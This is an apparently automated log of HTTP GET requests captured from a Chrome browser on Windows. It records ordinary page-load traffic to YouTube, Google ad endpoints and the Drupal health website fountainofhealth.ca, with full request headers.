Source: global traffic	HTTP traffic detected: GET /generate_204?UUowYQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
Source: global traffic	HTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /generate_204?--7krg HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /vi/FURi5aHgp1g/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCTwafuki5vRADsDtfgeiF3qyS0Ew HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /generate_204?6bdlyg HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: YSC=VZrzuY-qz_ocookie: __Secure-ROLLOUT_TOKEN=COa79u7kuMTQQBDQs4nkvtONAxjQs4nkvtONAw%3D%3Dcookie: VISITOR_INFO1_LIVE=qKGaFNOnpe0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgEA%3D%3Dpriority: i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /origin: https://www.youtube.comx-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/style.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/misc/drupalSettingsLoader.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/misc/drupal.init.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/css/webform_bootstrap.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/questionnaire.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/banner-slider.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/once/once.min.js?v=1.0.1 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/jquery-patch-min.js?v=10.1.0 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8x-client-data: CLbgygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
